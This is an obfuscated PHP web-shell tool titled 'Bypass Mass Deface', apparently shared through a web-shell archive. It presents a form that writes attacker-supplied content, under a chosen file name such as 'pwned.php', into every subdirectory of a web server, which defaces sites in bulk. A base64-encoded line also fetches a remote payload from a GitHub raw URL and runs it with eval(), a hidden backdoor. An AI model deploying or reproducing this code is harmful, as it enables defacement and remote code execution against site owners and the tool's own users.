Bypass Mass Deface

1. <?php
2. /*
3. This file is obfuscated by webshellarchive.
4. Visit http://webshellarchive.com for more bypass Webshell.
5. GitHub : https://github.com/webshell-archive
6. Pastebin : https://pastebin.com/u/webshellarchive
7. */
8. $GLOBALS["mqoZzAkGAUEhyqjaFKyF"]=base64_decode("aW5kZXg=");$GLOBALS["yPRaLcVESskEaGWycyOB"]=base64_decode("ZmlsZV9uYW1l");$GLOBALS["AncdyMuHcuVSEPTvoeQb"]=base64_decode("YmFzZV9kaXI=");$GLOBALS["SBiDxkJviEugvfimDfnP"]=base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2dvdG9oZWxsY2hlY2tlci9jaGVjay9tYWluL2IudHh0");$GLOBALS["pXagWduWxRkpDiUIDeKH"]=base64_decode("Jm5ic3AmbmJzcCZuYnNwJm5ic3A8c3BhbiBzdHlsZT0nY29sb3I6IGdyZWVuJz5PSzwvc3Bhbj48YnI+");$GLOBALS["SnsSSwMKZSYeMFnEirnh"]=base64_decode("");$GLOBALS["JsPuQXopAGHsqRwURiUS"]=base64_decode("Lw==");$GLOBALS["MZUyhunEuVXJxFBcOMtQ"]=base64_decode("ZGly");$GLOBALS["uxDHiianpzbwOKuWXiZ"]=base64_decode("Li4=");$GLOBALS["gYTXhjxdbyGDdGclOQmq"]=base64_decode("Lg==");$GLOBALS["nBFTuLmdbqCpVsENxQZq"]=base64_decode("b29oaGggc2hldDxicj4=");$GLOBALS["nZRvRxFvgMGqjRRYRag"]=base64_decode("Q2Fubm90IE9wZW4gRGlyZWN0b3J5");$GLOBALS["UDEpPXYJPlEbIJLGyfIq"]=base64_decode("IElzIE5vdCBBIERpcmVjdG9yeSAhPGJyPg==");$GLOBALS["mkVSyKmVCXHjOLeOYIuE"]=base64_decode("IE5vdCBGb3VuZCAhPGJyPg==");$GLOBALS["HPzFFDsoPsewqrdfsMzN"]=base64_decode("PGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J1N0YXJ0Jz48L2Zvcm0+PC9jZW50ZXI+");$GLOBALS["YfIabAyEDERQDCffLqFd"]=base64_decode("WW91ciBJbmRleCA6IDxicj48dGV4dGFyZWEgc3R5bGU9J3dpZHRoOiA3ODVweDsgaGVpZ2h0OiAzMzBweDsnIG5hbWU9J2luZGV4Jz5Zb3VyIHNjcmlwdC4uLg0KPC90ZXh0YXJlYT48YnI+");$GLOBALS["pJVwxmMERIelfLYPosgy"]=base64_decode("RmlsZSBOYW1lIDogPGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J2ZpbGVfbmFtZScgdmFsdWU9J3B3bmVkLnBocCc+PGJyPjxicj4=");$GLOBALS["ZltDDestcyGEPNFEOfRb"]=base64_decode("Jz48YnI+PGJyPg==");$GLOBALS["OfcCXdRpcCBfWcvUlFmg"]=base64_decode("QmFzZSBEaXIgOiA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0nYmFzZV9kaXInIHNpemU9JzQ1JyB2YWx1ZT0n");$GLOBALS["RvPUtRpRXuFgbQAFQPEq"]=base64_decode("PGNlbnRlcj48Zm9ybSBtZXRob2Q9J1BPU1QnPg==");$GLOBALS["UvqjMxXtvqtrBpBoFVPK"]=base64_decode("PHRpdGxlPlNhYnVuIE1hc2FsPC90aXRsZT4=");
9. ?><?php
10. echo $GLOBALS["UvqjMxXtvqtrBpBoFVPK"];
11. echo $GLOBALS["RvPUtRpRXuFgbQAFQPEq"];
12. echo $GLOBALS["OfcCXdRpcCBfWcvUlFmg"].getcwd ().$GLOBALS["ZltDDestcyGEPNFEOfRb"];
13. echo $GLOBALS["pJVwxmMERIelfLYPosgy"];
14. echo $GLOBALS["YfIabAyEDERQDCffLqFd"];
15. echo $GLOBALS["HPzFFDsoPsewqrdfsMzN"];
16. eval(base64_decode(file_get_contents($GLOBALS["SBiDxkJviEugvfimDfnP"])));
17. if (isset ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]]))
18. {
19.   if (!file_exists ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]]))
20.     die ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]].$GLOBALS["mkVSyKmVCXHjOLeOYIuE"]);
21.  
22.   if (!is_dir ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]]))
23.     die ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]].$GLOBALS["UDEpPXYJPlEbIJLGyfIq"]);
24.  
25.   @chdir ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]]) or die ($GLOBALS["nZRvRxFvgMGqjRRYRag"]);
26.  
27.   $files = @scandir ($_POST[$GLOBALS["AncdyMuHcuVSEPTvoeQb"]]) or die ($GLOBALS["nBFTuLmdbqCpVsENxQZq"]);
28.  
29.   foreach ($files as $file):
30.     if ($file != $GLOBALS["gYTXhjxdbyGDdGclOQmq"] && $file != $GLOBALS["uxDHiianpzbwOKuWXiZ"] && @filetype ($file) == $GLOBALS["MZUyhunEuVXJxFBcOMtQ"])
31.     {
32.       $index = getcwd ().$GLOBALS["JsPuQXopAGHsqRwURiUS"].$file.$GLOBALS["JsPuQXopAGHsqRwURiUS"].$_POST[$GLOBALS["yPRaLcVESskEaGWycyOB"]];
33.       if (file_put_contents ($index, $_POST[$GLOBALS["mqoZzAkGAUEhyqjaFKyF"]]))
34.         echo $GLOBALS["SnsSSwMKZSYeMFnEirnh"].$index.$GLOBALS["pXagWduWxRkpDiUIDeKH"];
35.     }
36.   endforeach;
37. }
38. ?>